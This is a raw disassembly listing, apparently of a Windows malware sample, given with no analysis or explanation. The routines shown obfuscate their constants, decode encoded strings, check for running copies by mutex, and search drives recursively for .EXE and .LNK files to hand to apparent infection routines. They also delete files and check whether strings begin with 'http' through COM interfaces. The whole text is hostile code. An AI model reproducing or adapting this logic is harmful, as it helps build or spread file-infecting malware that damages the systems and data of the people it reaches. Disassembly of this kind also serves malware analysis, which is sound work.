loc_443337: ; CODE XREF: sub_442E96+9E�j
; sub_442E96:loc_442F70�j ...
push [ebp+var_30E48]
call ds:dword_449650 ; CloseHandle
cmp [ebp+var_30F50], 0
jz short loc_443355
push [ebp+arg_0]
call ds:dword_445008 ; DeleteFileA
loc_443355: ; CODE XREF: sub_442E96+4D�j
; sub_442E96+4B4�j
pop edi
pop esi
pop ebx
leave
retn
sub_442E96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44335A proc near ; CODE XREF: sub_44287C+F5�p
; sub_442E96+1B4�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word_44B150
sub eax, 5
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_443483
; ---------------------------------------------------------------------------
loc_443388: ; CODE XREF: sub_44335A+131�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_44B34C[edx]
mov eax, dword_44B0A4
add eax, dword_44B0C0
sub eax, 2
neg eax
cmp esi, eax
jz loc_443482
mov eax, [ebp+var_8]
or eax, eax
jl loc_44347F
cmp eax, 3
jg loc_44347F
jmp off_44B74C[eax*4]
loc_4433C8: ; DATA XREF: .data:off_44B74C�o
inc [ebp+var_8]
jmp loc_44347F
; ---------------------------------------------------------------------------
loc_4433D0: ; CODE XREF: sub_44335A+67�j
; DATA XREF: .data:0044B750�o
mov edx, [ebp+var_C]
mov ecx, dword_44B0CC
add ecx, dword_44B190
sub ecx, 2
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, dword_44B0A0
add ecx, dword_44B130
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_44347F
; ---------------------------------------------------------------------------
loc_443413: ; CODE XREF: sub_44335A+67�j
; DATA XREF: .data:0044B754�o
mov edx, [ebp+var_C]
and edx, 0Fh
movsx ecx, word_44B0F4
sub ecx, 5
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
mov ecx, dword_44B0B8
sub ecx, 2
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_44347F
; ---------------------------------------------------------------------------
loc_443451: ; CODE XREF: sub_44335A+67�j
; DATA XREF: .data:0044B758�o
mov edx, [ebp+var_C]
and edx, 3
movsx ecx, word_44B168
sub ecx, 2
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
mov eax, dword_44B0B8
sub eax, 4
mov [ebp+var_8], eax
loc_44347F: ; CODE XREF: sub_44335A+58�j
; sub_44335A+61�j ...
mov [ebp+var_C], esi
loc_443482: ; CODE XREF: sub_44335A+4D�j
inc edi
loc_443483: ; CODE XREF: sub_44335A+29�j
cmp byte ptr [edi], 0
jz short loc_443491
cmp ebx, [ebp+var_4]
jb loc_443388
loc_443491: ; CODE XREF: sub_44335A+12C�j
cmp byte ptr [edi], 0
jnz short loc_44349D
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_4434AD
; ---------------------------------------------------------------------------
loc_44349D: ; CODE XREF: sub_44335A+13A�j
mov eax, dword_44B1AC
add eax, dword_44B0E4
sub eax, 5
neg eax
loc_4434AD: ; CODE XREF: sub_44335A+141�j
pop edi
pop esi
pop ebx
leave
retn
sub_44335A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4434B2 proc near ; CODE XREF: sub_43FEB1+184�p
; sub_43FEB1+202�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, dword_44B164
lea eax, [ebp+var_4]
push eax
push offset dword_44C8DC
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, dword_44B138
add eax, dword_44B0F8
sub eax, 0Ah
cmp edi, eax
jz short loc_4434EE
xor eax, eax
jmp short loc_443558
; ---------------------------------------------------------------------------
loc_4434EE: ; CODE XREF: sub_4434B2+36�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
movsx eax, word_44B100
sub eax, 9
cmp edi, eax
jnz short loc_44354D
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, dword_44B138
add eax, dword_44B0EC
sub eax, 0Dh
cmp edi, eax
jnz short loc_443544
mov eax, dword_44B164
movsx edx, word_44B100
mov esi, eax
add esi, edx
sub esi, 8
loc_443544: ; CODE XREF: sub_4434B2+7D�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_44354D: ; CODE XREF: sub_4434B2+5A�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_443558: ; CODE XREF: sub_4434B2+3A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4434B2 endp
; =============== S U B R O U T I N E =======================================
sub_44355D proc near ; DATA XREF: .data:0044B2E4�o
mov eax, 80004001h
retn 8
sub_44355D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443565 proc near ; CODE XREF: sub_43C281+C5�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word_44B16C
add eax, dword_44B0F0
sub eax, 8
push eax
push [ebp+arg_0]
call ds:dword_449630 ; VirtualFree
pop ebp
retn
sub_443565 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443589 proc near ; CODE XREF: sub_443E95+239�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_43B780
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_4437AC
mov [ebp+var_18], 8
push offset dword_44B794
call sub_43EFD7
pop ecx
push eax
call ds:dword_445044
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44B0D8
movsx edx, word_44B0E8
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_443790
lea eax, [ebp+var_3C]
push eax
push offset dword_44C91C
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B194
add eax, dword_44B174
sub eax, 9
cmp ebx, eax
jnz loc_443787
mov [ebp+var_30], 2
mov eax, dword_44B0CC
dec eax
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44B0F4
sub eax, 9
cmp ebx, eax
jnz loc_44377E
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44C90C
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
cmp ebx, dword_44B164
jnz loc_443775
inc ds:dword_44761C
mov eax, dword_44B160
add eax, 2
cmp ds:dword_44761C, eax
jb short loc_4436DB
mov eax, dword_44B1B8
add eax, 2
add eax, dword_44B0EC
mov ds:dword_44761C, eax
push [ebp+var_4]
call sub_43C154
pop ecx
jmp loc_44376C
; ---------------------------------------------------------------------------
loc_4436DB: ; CODE XREF: sub_443589+12F�j
mov eax, dword_44B18C
dec eax
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push ds:dword_44963C
call sub_43ACC9
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push ds:dword_445018
call sub_43ACC9
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_44372C
cmp [ebp+var_34], 0
jz short loc_44372C
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_43E5D5
add esp, 10h
loc_44372C: ; CODE XREF: sub_443589+186�j
; sub_443589+18C�j
cmp [ebp+var_40], 0
jz short loc_44374D
cmp [ebp+var_38], 0
jz short loc_44374D
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_43E5D5
add esp, 10h
loc_44374D: ; CODE XREF: sub_443589+1A7�j
; sub_443589+1AD�j
push [ebp+var_34]
call ds:dword_447618 ; LocalFree
push [ebp+var_38]
call ds:dword_447618 ; LocalFree
push 0
push [ebp+arg_4]
call sub_43B780
add esp, 8
loc_44376C: ; CODE XREF: sub_443589+14D�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443775: ; CODE XREF: sub_443589+115�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44377E: ; CODE XREF: sub_443589+ED�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443787: ; CODE XREF: sub_443589+9F�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443790: ; CODE XREF: sub_443589+6F�j
lea eax, [ebp+var_18]
push eax
call ds:dword_44ABA0
mov eax, dword_44B0D4
add eax, dword_44B10C
sub eax, 8
cmp ebx, eax
jz short $+2
loc_4437AC: ; CODE XREF: sub_443589+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_443589 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4437B1 proc near ; CODE XREF: sub_440946+273�p
; sub_442C0A:loc_442C3E�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
mov eax, dword_44B0AC
mov edi, eax
add edi, dword_44B174
sub edi, 0Bh
jmp loc_443855
; ---------------------------------------------------------------------------
loc_4437D2: ; CODE XREF: sub_4437B1+AE�j
push offset dword_44B788
call sub_4424C1
mov [ebp+var_108], eax
push offset word_44B77E
call sub_4424C1
mov esi, dword_44B124
movsx ebx, word_44B0E8
add esi, ebx
sub esi, 5
push esi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call ds:dword_449644 ; OpenMutexA
mov [ebp+var_104], eax
or eax, eax
jz short loc_443854
push eax
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B0FC
sub eax, 6
cmp edi, eax
jnz short loc_44384D
xor eax, eax
inc eax
jmp short loc_443867
; ---------------------------------------------------------------------------
loc_44384D: ; CODE XREF: sub_4437B1+95�j
mov eax, 2
jmp short loc_443867
; ---------------------------------------------------------------------------
loc_443854: ; CODE XREF: sub_4437B1+82�j
inc edi
loc_443855: ; CODE XREF: sub_4437B1+1C�j
mov eax, dword_44B164
add eax, 64h
cmp edi, eax
jb loc_4437D2
xor eax, eax
loc_443867: ; CODE XREF: sub_4437B1+9A�j
; sub_4437B1+A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_4437B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44386C proc near ; DATA XREF: .data:off_44B2D8�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C96C
push esi
call ds:dword_44A644
or eax, eax
jz short loc_443898
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4438E0
; ---------------------------------------------------------------------------
loc_443898: ; CODE XREF: sub_44386C+1A�j
push offset dword_44C8EC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_4438B8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4438E0
; ---------------------------------------------------------------------------
loc_4438B8: ; CODE XREF: sub_44386C+3A�j
push offset dword_44C8AC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_4438D8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4438E0
; ---------------------------------------------------------------------------
loc_4438D8: ; CODE XREF: sub_44386C+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_4438E0: ; CODE XREF: sub_44386C+2A�j
; sub_44386C+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_44386C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4438E7 proc near ; CODE XREF: sub_43B4C6+3E�p
; sub_43BE25+50�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_443914
movsx eax, word_44B0BC
add eax, dword_44B18C
sub eax, 0Ah
mov [ebp+var_248], eax
jmp short loc_44398C
; ---------------------------------------------------------------------------
loc_443914: ; CODE XREF: sub_4438E7+13�j
mov edx, [ebp+arg_4]
mov ecx, dword_44B1B0
cmp ds:dword_447630[edx*4], ecx
jnz short loc_44393C
push ebx
call ds:dword_447608 ; FindClose
mov eax, dword_44B0A8
sub eax, 2
push eax
call ds:dword_44A660 ; ExitThread
loc_44393C: ; CODE XREF: sub_4438E7+3D�j
mov eax, dword_44B0F8
add eax, 62h
mov [ebp+var_248], eax
push offset word_44B776
call sub_4424C1
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call ds:dword_44A634
add esp, 10h
lea eax, [ebp+var_252]
push eax
call ds:dword_44A664 ; GetDriveTypeA
cmp eax, 3
jnz short loc_44398C
movsx eax, word_44B148
add eax, 129h
mov [ebp+var_248], eax
loc_44398C: ; CODE XREF: sub_4438E7+2B�j
; sub_4438E7+91�j
xor edi, edi
inc edi
push offset byte_44B76F
call sub_4424C1
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44A634
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_4439B0: ; CODE XREF: sub_4438E7+CE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4439B0
mov edx, eax
movsx ecx, word_44B0E8
movsx eax, word_44B1A8
add ecx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_443A68
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_4439DA: ; CODE XREF: sub_4438E7+F8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4439DA
mov ecx, dword_44B1B8
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Ch
jnz short loc_443A68
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_443A06: ; CODE XREF: sub_4438E7+124�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443A06
mov ecx, dword_44B118
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Eh
jnz short loc_443A68
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_443A32: ; CODE XREF: sub_4438E7+150�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443A32
mov ecx, dword_44B144
add ecx, dword_44B0CC
sub ecx, 4
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Bh
jnz short loc_443A68
push esi
call sub_43DEF2
add esp, 4
loc_443A68: ; CODE XREF: sub_4438E7+E8�j
; sub_4438E7+118�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_443A6D: ; CODE XREF: sub_4438E7+18B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443A6D
mov edx, eax
movsx ecx, word_44B1A8
movsx eax, word_44B154
add ecx, eax
sub ecx, 3
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_443B2A
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_443A9A: ; CODE XREF: sub_4438E7+1B8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443A9A
mov ecx, dword_44B190
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_443B2A
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_443AC6: ; CODE XREF: sub_4438E7+1E4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443AC6
mov edx, eax
sub edx, dword_44B1C0
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 58h
jnz short loc_443B2A
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_443AED: ; CODE XREF: sub_4438E7+20B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443AED
movsx ecx, word_44B180
add ecx, dword_44B09C
sub ecx, 0Ch
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_443B2A
push [ebp+var_248]
push esi
call sub_442A46
add esp, 8
loc_443B2A: ; CODE XREF: sub_4438E7+1A8�j
; sub_4438E7+1D8�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_448258 ; FindFirstFileA
mov ebx, eax
movsx eax, word_44B0E0
movsx edx, word_44B154
add eax, edx
sub eax, 7
neg eax
cmp ebx, eax
jz loc_443C01
cmp [ebp+var_112], 2Eh
jz loc_443BFD
lea eax, [ebp+var_112]
push eax
push esi
push offset aSS_0 ; "%s%s\\"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_4438E7
add esp, 1Ch
jmp short loc_443BFD
; ---------------------------------------------------------------------------
loc_443B9B: ; CODE XREF: sub_4438E7+318�j
lea eax, [ebp+var_13E]
push eax
push ebx
call ds:dword_446004 ; FindNextFileA
mov edi, eax
or edi, edi
jnz short loc_443BC5
push [ebp+var_248]
call ds:dword_44A630
pop ecx
push ebx
call ds:dword_447608 ; FindClose
jmp short loc_443C01
; ---------------------------------------------------------------------------
loc_443BC5: ; CODE XREF: sub_4438E7+2C6�j
cmp [ebp+var_112], 2Eh
jz short loc_443BFD
lea eax, [ebp+var_112]
push eax
push esi
push offset aSS_0 ; "%s%s\\"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_4438E7
add esp, 1Ch
loc_443BFD: ; CODE XREF: sub_4438E7+27D�j
; sub_4438E7+2B2�j ...
or edi, edi
jnz short loc_443B9B
loc_443C01: ; CODE XREF: sub_4438E7+270�j
; sub_4438E7+2DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4438E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443C06 proc near ; CODE XREF: sub_442E96+120�p
; DATA XREF: sub_43B52C+A9�o
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_267]
push eax
call sub_43BFE5
push offset dword_44B764
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset dword_44B75C
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
mov eax, dword_44B174
movsx edx, word_44B090
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
movsx eax, word_44B0D0
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_443CB6
mov eax, 2Ah
jmp short loc_443D1F
; ---------------------------------------------------------------------------
loc_443CB6: ; CODE XREF: sub_443C06+A7�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_26C], eax
push edi
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B18C
add eax, dword_44B15C
sub eax, 5
cmp [ebp+var_26C], eax
jnz short loc_443CFC
mov eax, 2Ah
jmp short loc_443D1F
; ---------------------------------------------------------------------------
loc_443CFC: ; CODE XREF: sub_443C06+ED�j
movzx eax, [ebp+var_203]
movsx edx, word_44B090
add edx, 20h
cmp eax, edx
jge short loc_443D18
mov eax, 2Ah
jmp short loc_443D1F
; ---------------------------------------------------------------------------
loc_443D18: ; CODE XREF: sub_443C06+109�j
movzx eax, [ebp+var_203]
loc_443D1F: ; CODE XREF: sub_443C06+AE�j
; sub_443C06+F4�j ...
pop edi
pop esi
leave
retn
sub_443C06 endp
; =============== S U B R O U T I N E =======================================
sub_443D23 proc near ; CODE XREF: sub_441FCC+270�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
movsx eax, word_44B170
dec eax
cmp ecx, eax
jge short loc_443D61
movsx eax, word_44B180
dec eax
imul ecx, eax
mov eax, dword_44B178
sub eax, 2
mov edx, esi
add edx, eax
movsx eax, word_44B090
add eax, 3
imul edx, eax
sub ecx, edx
jmp loc_443E91
; ---------------------------------------------------------------------------
loc_443D61: ; CODE XREF: sub_443D23+11�j
dec ecx
movsx eax, word_44B090
mov edx, dword_44B0F8
lea eax, [eax+edx+11h]
cmp ecx, eax
jge short loc_443D98
mov eax, dword_44B12C
sub eax, 3
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, dword_44B104
add edx, 0Ah
mov ecx, eax
sub ecx, edx
jmp loc_443E91
; ---------------------------------------------------------------------------
loc_443D98: ; CODE XREF: sub_443D23+52�j
dec ecx
movsx eax, word_44B110
add eax, 1Eh
cmp ecx, eax
jge short loc_443DCD
mov eax, dword_44B184
add eax, dword_44B130
sub eax, 3
imul ecx, eax
mov eax, dword_44B178
add eax, 3Ah
add eax, dword_44B144
sub ecx, eax
jmp loc_443E91
; ---------------------------------------------------------------------------
loc_443DCD: ; CODE XREF: sub_443D23+82�j
dec ecx
mov eax, dword_44B120
add eax, 22h
cmp ecx, eax
jge short loc_443DF4
mov eax, dword_44B1C4
sub eax, 3
imul ecx, eax
mov eax, dword_44B0B8
add eax, 42h
sub ecx, eax
jmp loc_443E91
; ---------------------------------------------------------------------------
loc_443DF4: ; CODE XREF: sub_443D23+B5�j
dec ecx
mov eax, dword_44B1C0
add eax, 24h
movsx edx, word_44B0E8
add eax, edx
cmp ecx, eax
jge short loc_443E28
mov eax, dword_44B1C0
dec eax
imul ecx, eax
mov eax, dword_44B0FC
add eax, 48h
movsx edx, word_44B0E8
add eax, edx
sub ecx, eax
jmp short loc_443E91
; ---------------------------------------------------------------------------
loc_443E28: ; CODE XREF: sub_443D23+E5�j
dec ecx
mov eax, dword_44B178
add eax, 30h
add eax, dword_44B1B8
cmp ecx, eax
jge short loc_443E58
mov eax, dword_44B178
add eax, dword_44B164
dec eax
imul ecx, eax
movsx eax, word_44B0BC
add eax, 61h
sub ecx, eax
jmp short loc_443E91
; ---------------------------------------------------------------------------
loc_443E58: ; CODE XREF: sub_443D23+116�j
dec ecx
movsx eax, word_44B16C
lea eax, [eax+eax+31h]
cmp ecx, eax
jge short loc_443E81
mov eax, dword_44B12C
sub eax, 3
imul ecx, eax
movsx eax, word_44B19C
add eax, 6Ah
sub ecx, eax
jmp short loc_443E91
; ---------------------------------------------------------------------------
loc_443E81: ; CODE XREF: sub_443D23+143�j
mov eax, dword_44B12C
add eax, 30h
add eax, dword_44B0B8
sub ecx, eax
loc_443E91: ; CODE XREF: sub_443D23+39�j
; sub_443D23+70�j ...
mov eax, ecx
pop esi
retn
sub_443D23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443E95 proc near ; CODE XREF: sub_4425A3+40�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_444B40
push ebx
push esi
push edi
cmp dword_44B2B0, 0
jnz short loc_443EC2
mov eax, dword_44B14C
add eax, 4
cmp ds:dword_44761C, eax
jb loc_4440F1
loc_443EC2: ; CODE XREF: sub_443E95+17�j
lea eax, [ebp+var_10020]
push eax
call ds:dword_445038
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, dword_44B0F8
sub eax, 2
push eax
push [ebp+arg_0]
call ds:dword_448254
mov edi, eax
mov eax, dword_44B190
add eax, dword_44B098
sub eax, 0Ah
cmp edi, eax
jnz loc_4440F1
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push offset dword_44C97C
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, dword_44B1C0
sub eax, 3
cmp edi, eax
jnz loc_4440F1
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
cmp edi, dword_44B1A4
jnz loc_4440EB
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_43A9C0
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call ds:dword_44ABA0
cmp [ebp+var_10003], 68h
jnz short loc_443FAD
cmp [ebp+var_10002], 74h
jnz short loc_443FAD
cmp [ebp+var_10001], 74h
jnz short loc_443FAD
cmp [ebp+var_10000], 70h
jz short loc_443FB2
loc_443FAD: ; CODE XREF: sub_443E95+FB�j
; sub_443E95+104�j ...
jmp loc_4440EB
; ---------------------------------------------------------------------------
loc_443FB2: ; CODE XREF: sub_443E95+116�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, dword_44B160
add eax, dword_44B158
sub eax, 8
cmp edi, eax
jnz loc_4440EB
lea eax, [ebp+var_4]
push eax
push offset dword_44C8FC
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, dword_44B0B4
sub eax, 8
cmp edi, eax
jnz loc_4440DF
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, dword_44B0E4
add eax, dword_44B144
sub eax, 7
cmp edi, eax
jnz loc_4440D6
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
movsx eax, word_44B128
add eax, dword_44B0F8
sub eax, 2
cmp edi, eax
jz short loc_44406A
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_4440D6
; ---------------------------------------------------------------------------
